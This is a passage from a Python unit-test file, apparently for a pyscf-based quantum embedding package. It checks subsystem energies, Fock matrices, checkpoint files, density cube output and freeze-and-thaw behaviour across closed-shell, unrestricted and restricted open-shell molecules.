mf_init_dmat[0][np.ix_(s2s[0], s2s[0])] += subsys.env_dmat[0]
mf_init_dmat[1][np.ix_(s2s[0], s2s[0])] += subsys.env_dmat[1]
mf_init_dmat[0][np.ix_(s2s[1], s2s[1])] += subsys2.env_dmat[0]
mf_init_dmat[1][np.ix_(s2s[1], s2s[1])] += subsys2.env_dmat[1]
mf_hcore = mf.get_hcore()
mf_init_veff = mf.get_veff(dm=mf_init_dmat)
dm_1 = [mf_init_dmat[0][np.ix_(s2s[0], s2s[0])], mf_init_dmat[1][np.ix_(s2s[0], s2s[0])]]
hcore_1_emb = mf_hcore[np.ix_(s2s[0], s2s[0])]
veff_1_emb = [mf_init_veff[0][np.ix_(s2s[0], s2s[0])], mf_init_veff[0][np.ix_(s2s[0], s2s[0])]]
mf_1 = dft.UKS(self.os_mol1)
mf_1.xc = self.env_method
mf_1.grids = supersystem.fs_scf_obj.grids
hcore_1_emb = hcore_1_emb - mf_1.get_hcore()
veff_1 = mf_1.get_veff(dm=dm_1)
veff_1_emb = [veff_1_emb[0] - veff_1[0], veff_1_emb[1] - veff_1[1]]
test_sub1_e = mf_1.energy_elec(dm=dm_1)[0] + np.einsum('ij,ji', hcore_1_emb, dm_1[0]) + np.einsum('ij,ji', hcore_1_emb, dm_1[1]) + np.einsum('ij,ji', veff_1_emb[0], dm_1[0]) + np.einsum('ij,ji', veff_1_emb[1], dm_1[1])
dm_2 = [mf_init_dmat[0][np.ix_(s2s[1], s2s[1])], mf_init_dmat[1][np.ix_(s2s[1], s2s[1])]]
hcore_2_emb = mf_hcore[np.ix_(s2s[1], s2s[1])]
veff_2_emb = [mf_init_veff[1][np.ix_(s2s[1], s2s[1])], mf_init_veff[1][np.ix_(s2s[1], s2s[1])]]
mf_2 = dft.UKS(self.os_mol2)
mf_2.xc = self.env_method
mf_2.grids = supersystem.fs_scf_obj.grids
hcore_2_emb = hcore_2_emb - mf_2.get_hcore()
veff_2 = mf_2.get_veff(dm=dm_2)
veff_2_emb = [veff_2_emb[0] - veff_2[0], veff_2_emb[1] - veff_2[1]]
test_sub2_e = mf_2.energy_elec(dm=dm_2)[0] + np.einsum('ij,ji', hcore_2_emb, dm_2[0]) + np.einsum('ij,ji', hcore_2_emb, dm_2[1]) + np.einsum('ij,ji', veff_2_emb[0], dm_2[0]) + np.einsum('ij,ji', veff_2_emb[1], dm_2[1])
sub1_e = supersystem.subsystems[0].get_env_elec_energy()
sub2_e = supersystem.subsystems[1].get_env_elec_energy()
self.assertAlmostEqual(test_sub1_e, sub1_e, delta=1e-8)
self.assertAlmostEqual(test_sub2_e, sub2_e, delta=1e-8)
# Restricted Open Shell
hl_method = 'ccsd'
subsys = cluster_subsystem.ClusterHLSubSystem(self.os_mol1, self.env_method, hl_method)
subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.cs_mol3, self.env_method)
mol13 = helpers.concat_mols([self.os_mol1, self.cs_mol3])
fs_scf_obj = helpers.gen_scf_obj(mol13, self.env_method)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], self.env_method, fs_scf_obj, init_guess='minao')
supersystem.init_density()
supsystem_e = supersystem.get_supersystem_energy()
mf = dft.ROKS(supersystem.mol)
mf.xc = self.env_method
mf_t_dmat = mf.get_init_guess(key='minao')
mf_init_dmat = np.zeros_like(mf_t_dmat)
#get energies of two embedded systems.
s2s = supersystem.sub2sup
mf_init_dmat[0][np.ix_(s2s[0], s2s[0])] += subsys.env_dmat[0]
mf_init_dmat[1][np.ix_(s2s[0], s2s[0])] += subsys.env_dmat[1]
mf_init_dmat[0][np.ix_(s2s[1], s2s[1])] += subsys2.env_dmat[0]
mf_init_dmat[1][np.ix_(s2s[1], s2s[1])] += subsys2.env_dmat[1]
mf_hcore = mf.get_hcore()
mf_init_veff = mf.get_veff(dm=mf_init_dmat)
dm_1 = [mf_init_dmat[0][np.ix_(s2s[0], s2s[0])], mf_init_dmat[1][np.ix_(s2s[0], s2s[0])]]
hcore_1_emb = mf_hcore[np.ix_(s2s[0], s2s[0])]
veff_1_emb = [mf_init_veff[0][np.ix_(s2s[0], s2s[0])], mf_init_veff[1][np.ix_(s2s[0], s2s[0])]]
mf_1 = dft.ROKS(self.os_mol1)
mf_1.xc = self.env_method
mf_1.grids = supersystem.fs_scf_obj.grids
hcore_1_emb = hcore_1_emb - mf_1.get_hcore()
veff_1 = mf_1.get_veff(dm=dm_1)
veff_1_emb = [veff_1_emb[0] - veff_1[0], veff_1_emb[1] - veff_1[1]]
test_sub1_e = mf_1.energy_elec(dm=dm_1)[0] + np.einsum('ij,ji', hcore_1_emb, dm_1[0]) + np.einsum('ij,ji', hcore_1_emb, dm_1[1]) + np.einsum('ij,ji', veff_1_emb[0], dm_1[0]) + np.einsum('ij,ji', veff_1_emb[1], dm_1[1])
dm_2 = [mf_init_dmat[0][np.ix_(s2s[1], s2s[1])], mf_init_dmat[1][np.ix_(s2s[1], s2s[1])]]
hcore_2_emb = mf_hcore[np.ix_(s2s[1], s2s[1])]
veff_2_emb = [mf_init_veff[0][np.ix_(s2s[1], s2s[1])], mf_init_veff[1][np.ix_(s2s[1], s2s[1])]]
mf_2 = dft.ROKS(self.cs_mol3)
mf_2.xc = self.env_method
mf_2.grids = supersystem.fs_scf_obj.grids
hcore_2_emb = hcore_2_emb - mf_2.get_hcore()
veff_2 = mf_2.get_veff(dm=dm_2)
veff_2_emb = [veff_2_emb[0] - veff_2[0], veff_2_emb[1] - veff_2[1]]
test_sub2_e = mf_2.energy_elec(dm=dm_2)[0] + np.einsum('ij,ji', hcore_2_emb, dm_2[0]) + np.einsum('ij,ji', hcore_2_emb, dm_2[1]) + np.einsum('ij,ji', veff_2_emb[0], dm_2[0]) + np.einsum('ij,ji', veff_2_emb[1], dm_2[1])
sub1_e = supersystem.subsystems[0].get_env_elec_energy()
supersystem.subsystems[1].update_subsys_fock()
sub2_e = supersystem.subsystems[1].get_env_elec_energy() #this part of the test doesn't work because negative spin.
self.assertAlmostEqual(test_sub1_e, sub1_e, delta=1e-8)
self.assertAlmostEqual(test_sub2_e, sub2_e, delta=1e-8)
    @unittest.skip
    def test_get_env_in_env_energy(self):
        # TODO: placeholder — the env-in-env energy test has not been
        # written yet; the skip keeps it out of the suite until then.
        pass
    def test_update_fock(self):
        """The supersystem Fock matrix (hcore + veff of the block-diagonal
        subsystem density) and the subsystem embedded Fock blocks must
        match a manual construction with pyscf."""
        # Closed Shell
        hl_method = 'ccsd'
        subsys = cluster_subsystem.ClusterHLSubSystem(self.cs_mol1, self.env_method, hl_method)
        subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.cs_mol2, self.env_method)
        mol12 = helpers.concat_mols([self.cs_mol1, self.cs_mol2])
        fs_scf_obj = helpers.gen_scf_obj(mol12, self.env_method)
        supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], self.env_method, fs_scf_obj, init_guess='minao')
        supersystem.init_density()
        # NOTE(review): scf.RKS is used here while the other sections use
        # dft.RKS — presumably equivalent aliases in pyscf; confirm.
        mf = scf.RKS(supersystem.mol)
        mf.xc = self.env_method
        grids = dft.gen_grid.Grids(supersystem.mol)
        grids.build()
        mf.grids = grids
        mf_init_dmat = np.zeros_like(supersystem.get_emb_dmat())
        # Block-diagonal supermolecular density from the subsystem densities.
        s2s = supersystem.sub2sup
        mf_init_dmat[np.ix_(s2s[0], s2s[0])] += subsys.get_dmat()
        mf_init_dmat[np.ix_(s2s[1], s2s[1])] += subsys2.get_dmat()
        mf_hcore = mf.get_hcore()
        mf_init_veff = mf.get_veff(dm=mf_init_dmat)
        full_fock = mf_hcore + mf_init_veff
        self.assertTrue(np.allclose(full_fock, supersystem.fock[0]))
        # Each subsystem's embedded Fock is the corresponding diagonal block.
        test_fock1 = full_fock[np.ix_(s2s[0], s2s[0])]
        test_fock2 = full_fock[np.ix_(s2s[1], s2s[1])]
        self.assertTrue(np.allclose(test_fock1, supersystem.subsystems[0].emb_fock[0]))
        self.assertTrue(np.allclose(test_fock2, supersystem.subsystems[1].emb_fock[0]))
        # Unrestricted Open Shell
        hl_method = 'ccsd'
        subsys = cluster_subsystem.ClusterHLSubSystem(self.os_mol1, self.env_method, hl_method, unrestricted=True)
        subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.os_mol2, self.env_method, unrestricted=True)
        mol12 = helpers.concat_mols([self.os_mol1, self.os_mol2])
        fs_scf_obj = helpers.gen_scf_obj(mol12, self.env_method, unrestricted=True)
        supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], self.env_method, fs_scf_obj, init_guess='minao', unrestricted=True)
        supersystem.init_density()
        supersystem.update_fock()
        mf = dft.UKS(supersystem.mol.copy())
        mf.xc = self.env_method
        mf_t_dmat = mf.get_init_guess(key='minao')
        mf_init_dmat = np.zeros_like(mf_t_dmat)
        #get energies of two embedded systems.
        s2s = supersystem.sub2sup
        mf_init_dmat[0][np.ix_(s2s[0], s2s[0])] += subsys.env_dmat[0]
        mf_init_dmat[0][np.ix_(s2s[1], s2s[1])] += subsys2.env_dmat[0]
        mf_init_dmat[1][np.ix_(s2s[0], s2s[0])] += subsys.env_dmat[1]
        mf_init_dmat[1][np.ix_(s2s[1], s2s[1])] += subsys2.env_dmat[1]
        mf_hcore = mf.get_hcore()
        mf_init_veff = mf.get_veff(dm=mf_init_dmat)
        # Separate alpha and beta Fock matrices share the same hcore.
        full_fock = [mf_hcore + mf_init_veff[0], mf_hcore + mf_init_veff[1]]
        self.assertTrue(np.allclose(full_fock[0], supersystem.fock[0]))
        self.assertTrue(np.allclose(full_fock[1], supersystem.fock[1]))
        test_fock1 = [full_fock[0][np.ix_(s2s[0], s2s[0])], full_fock[1][np.ix_(s2s[0], s2s[0])]]
        test_fock2 = [full_fock[0][np.ix_(s2s[1], s2s[1])], full_fock[1][np.ix_(s2s[1], s2s[1])]]
        self.assertTrue(np.allclose(test_fock1[0], supersystem.subsystems[0].emb_fock[0]))
        self.assertTrue(np.allclose(test_fock1[1], supersystem.subsystems[0].emb_fock[1]))
        self.assertTrue(np.allclose(test_fock2[0], supersystem.subsystems[1].emb_fock[0]))
        self.assertTrue(np.allclose(test_fock2[1], supersystem.subsystems[1].emb_fock[1]))
        # Restricted Open Shell
        hl_method = 'ccsd'
        subsys = cluster_subsystem.ClusterHLSubSystem(self.os_mol1, self.env_method, hl_method)
        subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.cs_mol3, self.env_method)
        mol13 = helpers.concat_mols([self.os_mol1, self.cs_mol3])
        fs_scf_obj = helpers.gen_scf_obj(mol13, self.env_method)
        supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], self.env_method, fs_scf_obj, init_guess='minao')
        supersystem.init_density()
        supersystem.update_fock()
        mf = dft.ROKS(supersystem.mol.copy())
        mf.xc = self.env_method
        mf_t_dmat = mf.get_init_guess(key='minao')
        mf_init_dmat = np.zeros_like(mf_t_dmat)
        #get energies of two embedded systems.
        s2s = supersystem.sub2sup
        mf_init_dmat[0][np.ix_(s2s[0], s2s[0])] += subsys.env_dmat[0]
        mf_init_dmat[0][np.ix_(s2s[1], s2s[1])] += subsys2.env_dmat[0]
        mf_init_dmat[1][np.ix_(s2s[0], s2s[0])] += subsys.env_dmat[1]
        mf_init_dmat[1][np.ix_(s2s[1], s2s[1])] += subsys2.env_dmat[1]
        mf_hcore = mf.get_hcore()
        mf_init_veff = mf.get_veff(dm=mf_init_dmat)
        full_fock = [mf_hcore + mf_init_veff[0], mf_hcore + mf_init_veff[1]]
        self.assertTrue(np.allclose(full_fock[0], supersystem.fock[0]))
        self.assertTrue(np.allclose(full_fock[1], supersystem.fock[1]))
        test_fock1 = [full_fock[0][np.ix_(s2s[0], s2s[0])], full_fock[1][np.ix_(s2s[0], s2s[0])]]
        test_fock2 = [full_fock[0][np.ix_(s2s[1], s2s[1])], full_fock[1][np.ix_(s2s[1], s2s[1])]]
        self.assertTrue(np.allclose(test_fock1[0], supersystem.subsystems[0].emb_fock[0]))
        self.assertTrue(np.allclose(test_fock1[1], supersystem.subsystems[0].emb_fock[1]))
        self.assertTrue(np.allclose(test_fock2[0], supersystem.subsystems[1].emb_fock[0]))
        self.assertTrue(np.allclose(test_fock2[1], supersystem.subsystems[1].emb_fock[1]))
def test_save_read_chkfile(self):
t_file = tempfile.NamedTemporaryFile()
hl_method = 'ccsd'
#Closed Shell
subsys = cluster_subsystem.ClusterHLSubSystem(self.cs_mol1, self.env_method, hl_method, filename=t_file.name)
subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.cs_mol2, self.env_method, filename=t_file.name)
mol12 = helpers.concat_mols([self.cs_mol1, self.cs_mol2])
fs_scf_obj = helpers.gen_scf_obj(mol12, self.env_method)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], self.env_method, fs_scf_obj, init_guess='minao', filename=t_file.name)
supersystem.init_density()
old_dmat = supersystem.fs_dmat
old_sub1_dmat = supersystem.subsystems[0].get_dmat()
old_sub2_dmat = supersystem.subsystems[1].get_dmat()
supersystem2 = cluster_supersystem.ClusterSuperSystem([copy(subsys), copy(subsys2)], self.env_method, fs_scf_obj, init_guess='chk', filename=t_file.name)
supersystem2.init_density()
new_dmat = supersystem2.fs_dmat
new_sub1_dmat = supersystem2.subsystems[0].get_dmat()
new_sub2_dmat = supersystem2.subsystems[1].get_dmat()
self.assertTrue(np.equal(old_dmat, new_dmat).all)
self.assertTrue(np.equal(old_sub1_dmat, new_sub1_dmat).all)
self.assertTrue(np.equal(old_sub2_dmat, new_sub2_dmat).all)
#Unrestricted
subsys = cluster_subsystem.ClusterHLSubSystem(self.os_mol1, self.env_method, hl_method, filename=t_file.name, unrestricted=True)
subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.os_mol2, self.env_method, filename=t_file.name, unrestricted=True)
mol12 = helpers.concat_mols([self.os_mol1, self.os_mol2])
fs_scf_obj = helpers.gen_scf_obj(mol12, self.env_method, unrestricted=True)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], self.env_method, fs_scf_obj, init_guess='minao', filename=t_file.name, unrestricted=True)
supersystem.init_density()
old_dmat = supersystem.fs_dmat
old_sub1_dmat = supersystem.subsystems[0].get_dmat()
old_sub2_dmat = supersystem.subsystems[1].get_dmat()
supersystem2 = cluster_supersystem.ClusterSuperSystem([copy(subsys), copy(subsys2)], self.env_method, fs_scf_obj, init_guess='chk', filename=t_file.name, unrestricted=True)
supersystem2.init_density()
new_dmat = supersystem2.fs_dmat
new_sub1_dmat = supersystem2.subsystems[0].get_dmat()
new_sub2_dmat = supersystem2.subsystems[1].get_dmat()
self.assertTrue(np.equal(old_dmat, new_dmat).all)
self.assertTrue(np.equal(old_sub1_dmat, new_sub1_dmat).all)
self.assertTrue(np.equal(old_sub2_dmat, new_sub2_dmat).all)
#Restricted Open Shell
subsys = cluster_subsystem.ClusterHLSubSystem(self.os_mol1, self.env_method, hl_method, filename=t_file.name)
subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.cs_mol3, self.env_method, filename=t_file.name)
mol13 = helpers.concat_mols([self.os_mol1, self.cs_mol3])
fs_scf_obj = helpers.gen_scf_obj(mol13, self.env_method)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], self.env_method, fs_scf_obj, init_guess='minao', filename=t_file.name)
supersystem.init_density()
old_dmat = supersystem.fs_dmat
old_sub1_dmat = supersystem.subsystems[0].get_dmat()
old_sub2_dmat = supersystem.subsystems[1].get_dmat()
supersystem2 = cluster_supersystem.ClusterSuperSystem([copy(subsys), copy(subsys2)], self.env_method, fs_scf_obj, init_guess='chk', filename=t_file.name)
supersystem2.init_density()
new_dmat = supersystem2.fs_dmat
new_sub1_dmat = supersystem2.subsystems[0].get_dmat()
new_sub2_dmat = supersystem2.subsystems[1].get_dmat()
self.assertTrue(np.equal(old_dmat, new_dmat).all)
self.assertTrue(np.equal(old_sub1_dmat, new_sub1_dmat).all)
self.assertTrue(np.equal(old_sub2_dmat, new_sub2_dmat).all)
@unittest.skip
def test_save_ft_density(self):
from pyscf.tools import cubegen
t_file = tempfile.NamedTemporaryFile()
hl_method = 'ccsd'
#Closed Shell
subsys = cluster_subsystem.ClusterHLSubSystem(self.cs_mol1, self.env_method, hl_method, filename=t_file.name)
subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.cs_mol2, self.env_method, filename=t_file.name)
mol12 = helpers.concat_mols([self.cs_mol1, self.cs_mol2])
fs_scf_obj = helpers.gen_scf_obj(mol12, self.env_method)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], self.env_method, fs_scf_obj, init_guess='minao', filename=t_file.name)
supersystem.init_density()
supersystem.get_supersystem_energy()
supersystem.freeze_and_thaw()
supersystem.save_ft_density_file()
true_ftmp = tempfile.NamedTemporaryFile()
chkfile_index = supersystem.chkfile_index
nS = supersystem.mol.nao_nr()
dm_env = [np.zeros((nS, nS)), np.zeros((nS, nS))]
for i in range(len(supersystem.subsystems)):
dm_env[0][np.ix_(supersystem.sub2sup[i], supersystem.sub2sup[i])] += supersystem.subsystems[i].env_dmat[0]
dm_env[1][np.ix_(supersystem.sub2sup[i], supersystem.sub2sup[i])] += supersystem.subsystems[i].env_dmat[1]
sup_dmat = dm_env[0] + dm_env[1]
cubegen.density(supersystem.mol.copy(), true_ftmp.name, sup_dmat)
with open(t_file.name + '_' + chkfile_index + '_ft.cube', 'r') as fin:
test_den_data = fin.read()
with open(true_ftmp.name, 'r') as fin:
true_den_data = fin.read()
self.assertEqual(test_den_data[99:], true_den_data[99:])
#Unrestricted
subsys = cluster_subsystem.ClusterHLSubSystem(self.os_mol1, self.env_method, hl_method, filename=t_file.name, unrestricted=True)
subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.os_mol2, self.env_method, filename=t_file.name, unrestricted=True)
mol12 = helpers.concat_mols([self.os_mol1, self.os_mol2])
fs_scf_obj = helpers.gen_scf_obj(mol12, self.env_method, unrestricted=True)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], self.env_method, fs_scf_obj, init_guess='minao', filename=t_file.name, unrestricted=True)
supersystem.init_density()
supersystem.get_supersystem_energy()
supersystem.freeze_and_thaw()
supersystem.save_ft_density_file()
true_ftmp = tempfile.NamedTemporaryFile()
chkfile_index = supersystem.chkfile_index
nS = supersystem.mol.nao_nr()
dm_env = [np.zeros((nS, nS)), np.zeros((nS, nS))]
for i in range(len(supersystem.subsystems)):
dm_env[0][np.ix_(supersystem.sub2sup[i], supersystem.sub2sup[i])] += supersystem.subsystems[i].env_dmat[0]
dm_env[1][np.ix_(supersystem.sub2sup[i], supersystem.sub2sup[i])] += supersystem.subsystems[i].env_dmat[1]
cubegen.density(supersystem.mol.copy(), true_ftmp.name, dm_env[0])
with open(t_file.name + '_' + chkfile_index + '_ft_alpha.cube', 'r') as fin:
test_den_data = fin.read()
with open(true_ftmp.name, 'r') as fin:
true_den_data = fin.read()
self.assertEqual(test_den_data[99:], true_den_data[99:])
cubegen.density(supersystem.mol.copy(), true_ftmp.name, dm_env[1])
with open(t_file.name + '_' + chkfile_index + '_ft_beta.cube', 'r') as fin:
test_den_data = fin.read()
with open(true_ftmp.name, 'r') as fin:
true_den_data = fin.read()
self.assertEqual(test_den_data[99:], true_den_data[99:])
#Restricted open shell
subsys = cluster_subsystem.ClusterHLSubSystem(self.os_mol1, self.env_method, hl_method, filename=t_file.name)
subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.cs_mol3, self.env_method, filename=t_file.name)
mol13 = helpers.concat_mols([self.os_mol1, self.cs_mol3])
fs_scf_obj = helpers.gen_scf_obj(mol13, self.env_method)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], self.env_method, fs_scf_obj, init_guess='minao', filename=t_file.name)
supersystem.init_density()
supersystem.get_supersystem_energy()
supersystem.freeze_and_thaw()
supersystem.save_ft_density_file()
true_ftmp = tempfile.NamedTemporaryFile()
chkfile_index = supersystem.chkfile_index
nS = supersystem.mol.nao_nr()
dm_env = [np.zeros((nS, nS)), np.zeros((nS, nS))]
for i in range(len(supersystem.subsystems)):
dm_env[0][np.ix_(supersystem.sub2sup[i], supersystem.sub2sup[i])] += supersystem.subsystems[i].env_dmat[0]
dm_env[1][np.ix_(supersystem.sub2sup[i], supersystem.sub2sup[i])] += supersystem.subsystems[i].env_dmat[1]
cubegen.density(supersystem.mol.copy(), true_ftmp.name, dm_env[0])
with open(t_file.name + '_' + chkfile_index + '_ft_alpha.cube', 'r') as fin:
test_den_data = fin.read()
with open(true_ftmp.name, 'r') as fin:
true_den_data = fin.read()
self.assertEqual(test_den_data[99:], true_den_data[99:])
cubegen.density(supersystem.mol.copy(), true_ftmp.name, dm_env[1])
with open(t_file.name + '_' + chkfile_index + '_ft_beta.cube', 'r') as fin:
test_den_data = fin.read()
with open(true_ftmp.name, 'r') as fin:
true_den_data = fin.read()
self.assertEqual(test_den_data[99:], true_den_data[99:])
@unittest.skip
def test_save_ft_spin_density(self):
from pyscf.tools import cubegen
hl_method = 'ccsd'
t_file = tempfile.NamedTemporaryFile()
#Unrestricted
subsys = cluster_subsystem.ClusterHLSubSystem(self.os_mol1, self.env_method, hl_method, filename=t_file.name, unrestricted=True)
subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.os_mol2, self.env_method, filename=t_file.name, unrestricted=True)
mol12 = helpers.concat_mols([self.os_mol1, self.os_mol2])
fs_scf_obj = helpers.gen_scf_obj(mol12, self.env_method, unrestricted=True)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], self.env_method, fs_scf_obj, init_guess='minao', filename=t_file.name, unrestricted=True)
supersystem.init_density()
supersystem.get_supersystem_energy()
supersystem.freeze_and_thaw()
supersystem.save_ft_spin_density_file()
true_ftmp = tempfile.NamedTemporaryFile()
chkfile_index = supersystem.chkfile_index
nS = supersystem.mol.nao_nr()
dm_env = [np.zeros((nS, nS)), np.zeros((nS, nS))]
for i in range(len(supersystem.subsystems)):
dm_env[0][np.ix_(supersystem.sub2sup[i], supersystem.sub2sup[i])] += supersystem.subsystems[i].env_dmat[0]
dm_env[1][np.ix_(supersystem.sub2sup[i], supersystem.sub2sup[i])] += supersystem.subsystems[i].env_dmat[1]
cubegen.density(supersystem.mol.copy(), true_ftmp.name, np.subtract(dm_env[0], dm_env[1]))
with open(t_file.name + '_' + chkfile_index + '_ft_spinden.cube', 'r') as fin:
test_den_data = fin.read()
with open(true_ftmp.name, 'r') as fin:
true_den_data = fin.read()
self.assertEqual(test_den_data[99:], true_den_data[99:])
#Restricted open shell
subsys = cluster_subsystem.ClusterHLSubSystem(self.os_mol1, self.env_method, hl_method, filename=t_file.name)
subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.cs_mol3, self.env_method, filename=t_file.name)
mol13 = helpers.concat_mols([self.os_mol1, self.cs_mol3])
fs_scf_obj = helpers.gen_scf_obj(mol13, self.env_method)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], self.env_method, fs_scf_obj, init_guess='minao', filename=t_file.name)
supersystem.init_density()
supersystem.get_supersystem_energy()
supersystem.freeze_and_thaw()
supersystem.save_ft_spin_density_file()
true_ftmp = tempfile.NamedTemporaryFile()
chkfile_index = supersystem.chkfile_index
nS = supersystem.mol.nao_nr()
dm_env = [np.zeros((nS, nS)), np.zeros((nS, nS))]
for i in range(len(supersystem.subsystems)):
dm_env[0][np.ix_(supersystem.sub2sup[i], supersystem.sub2sup[i])] += supersystem.subsystems[i].env_dmat[0]
dm_env[1][np.ix_(supersystem.sub2sup[i], supersystem.sub2sup[i])] += supersystem.subsystems[i].env_dmat[1]
cubegen.density(supersystem.mol.copy(), true_ftmp.name, np.subtract(dm_env[0], dm_env[1]))
with open(t_file.name + '_' + chkfile_index + '_ft_spinden.cube', 'r') as fin:
test_den_data = fin.read()
with open(true_ftmp.name, 'r') as fin:
true_den_data = fin.read()
self.assertEqual(test_den_data[99:], true_den_data[99:])
@unittest.skip
def test_freeze_and_thaw(self):
#Restricted closed shell
#Supermolecular test.
mol = gto.Mole()
mol.verbose = 3
mol.atom = '''
C 0.7710806955 -0.0001048861 0.0000400510
H 1.1560846512 0.8695663320 -0.5203105003
H 1.1560491322 0.0161891484 1.0133671125
H 1.1560865179 -0.8856013435 -0.4928324985
ghost:C -0.7713511096 -0.0001546299 -0.0000054393
ghost:H -1.1561315704 0.8855266211 0.4927506464
ghost:H -1.1560645399 -0.0160685116 -1.0134290757
ghost:H -1.1560647411 -0.8697976282 0.5205503870
'''
mol.basis = 'cc-pVDZ'
mol.charge = -1
mol.build()
env_method = 'pbe'
active_method = 'ccsd'
subsys = cluster_subsystem.ClusterHLSubSystem(mol, env_method, active_method)
mol2 = gto.Mole()
mol2.verbose = 3
mol2.atom = '''
ghost:C 0.7710806955 -0.0001048861 0.0000400510
ghost:H 1.1560846512 0.8695663320 -0.5203105003
ghost:H 1.1560491322 0.0161891484 1.0133671125
ghost:H 1.1560865179 -0.8856013435 -0.4928324985
C -0.7713511096 -0.0001546299 -0.0000054393
H -1.1561315704 0.8855266211 0.4927506464
H -1.1560645399 -0.0160685116 -1.0134290757
H -1.1560647411 -0.8697976282 0.5205503870
'''
mol2.basis = 'cc-pVDZ'
mol2.charge = 1
mol2.build()
env_method = 'pbe'
subsys2 = cluster_subsystem.ClusterEnvSubSystem(mol2, env_method)
mol12 = helpers.concat_mols([mol, mol2])
fs_scf_obj = helpers.gen_scf_obj(mol12, env_method)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], env_method, fs_scf_obj, max_cycle=25, diis_num=1)
supersystem.init_density()
supersystem.freeze_and_thaw()
supersystem.get_env_in_env_energy()
supersystem.get_supersystem_energy()
projector_energy = np.trace(np.dot(subsys.env_dmat[0], supersystem.proj_pot[0][0]))
projector_energy += np.trace(np.dot(subsys.env_dmat[1], supersystem.proj_pot[0][1]))
projector_energy += np.trace(np.dot(subsys2.env_dmat[0], supersystem.proj_pot[1][0]))
projector_energy += np.trace(np.dot(subsys2.env_dmat[1], supersystem.proj_pot[1][1]))
self.assertAlmostEqual(0.0, projector_energy, delta=1e-10)
sup_e = supersystem.get_env_in_env_energy()
test_e = supersystem.get_supersystem_energy()
self.assertAlmostEqual(test_e, sup_e, delta=1e-10)
#Long distance test.
mol = gto.Mole()
mol.verbose = 3
mol.atom = '''
H 0.74 0. 0.
H 0. 0. 0.
'''
mol.basis = '3-21g'
mol.build()
env_method = 'm06'
active_method = 'ccsd'
subsys = cluster_subsystem.ClusterHLSubSystem(mol, env_method, active_method)
mol2 = gto.Mole()
mol2.verbose = 3
mol2.atom = '''
H 11.48 0.0 0.0
H 12.22 0.0 0.0
'''
mol2.basis = '3-21g'
mol2.build()
env_method = 'm06'
subsys2 = cluster_subsystem.ClusterEnvSubSystem(mol2, env_method)
mol12 = helpers.concat_mols([mol, mol2])
fs_scf_obj = helpers.gen_scf_obj(mol12, env_method)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], env_method, fs_scf_obj, init_guess='minao')
supersystem.init_density()
supersystem.freeze_and_thaw()
projector_energy = np.trace(np.dot(subsys.env_dmat[0], supersystem.proj_pot[0][0]))
projector_energy += np.trace(np.dot(subsys.env_dmat[1], supersystem.proj_pot[0][1]))
projector_energy += np.trace(np.dot(subsys2.env_dmat[0], supersystem.proj_pot[1][0]))
projector_energy += np.trace(np.dot(subsys2.env_dmat[1], supersystem.proj_pot[1][1]))
self.assertAlmostEqual(0.0, projector_energy, delta=1e-15)
mol3 = gto.Mole()
mol3.verbose = 3
mol3.atom ='''
H 0.74 0. 0.
H 0. 0. 0.
H 11.48 0.0 0.0
H 12.22 0.0 0.0
'''
mol3.basis = '3-21g'
mol3.build()
mf = dft.RKS(mol3)
mf.xc = 'm06'
mf.kernel()
test_dmat = mf.make_rdm1()
test_e = mf.energy_tot()
sup_e = supersystem.get_env_in_env_energy()
self.assertAlmostEqual(test_e, sup_e, delta=1e-10)
#Projection energy
mol = gto.Mole()
mol.verbose = 3
mol.atom = '''
H 0.74 0. 0.
H 0. 0. 0.
'''
mol.basis = '3-21g'
mol.build()
env_method = 'm06'
active_method = 'ccsd'
subsys = cluster_subsystem.ClusterHLSubSystem(mol, env_method, active_method)
mol2 = gto.Mole()
mol2.verbose = 3
mol2.atom = '''
H 1.48 0.0 0.0
H 2.22 0.0 0.0
'''
mol2.basis = '3-21g'
mol2.build()
env_method = 'm06'
subsys2 = cluster_subsystem.ClusterEnvSubSystem(mol2, env_method)
mol12 = helpers.concat_mols([mol, mol2])
fs_scf_obj = helpers.gen_scf_obj(mol12, env_method)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], 'm06', fs_scf_obj, init_guess='supmol')
supersystem.init_density()
initial_projector_energy = 0.0
initial_projector_energy = np.trace(np.dot(subsys.env_dmat[0], supersystem.proj_pot[0][0]))
initial_projector_energy += np.trace(np.dot(subsys.env_dmat[1], supersystem.proj_pot[0][1]))
initial_projector_energy += np.trace(np.dot(subsys2.env_dmat[0], supersystem.proj_pot[1][0]))
initial_projector_energy += np.trace(np.dot(subsys2.env_dmat[1], supersystem.proj_pot[1][1]))
supersystem.freeze_and_thaw()
projector_energy = np.trace(np.dot(subsys.env_dmat[0], supersystem.proj_pot[0][0]))
projector_energy += np.trace(np.dot(subsys.env_dmat[1], supersystem.proj_pot[0][1]))
projector_energy += np.trace(np.dot(subsys2.env_dmat[0], supersystem.proj_pot[1][0]))
projector_energy += np.trace(np.dot(subsys2.env_dmat[1], supersystem.proj_pot[1][1]))
self.assertGreaterEqual(0.0, projector_energy-initial_projector_energy)
# Unrestricted Open Shell
###Supermolecular test.
#mol = gto.Mole()
#mol.verbose = 3
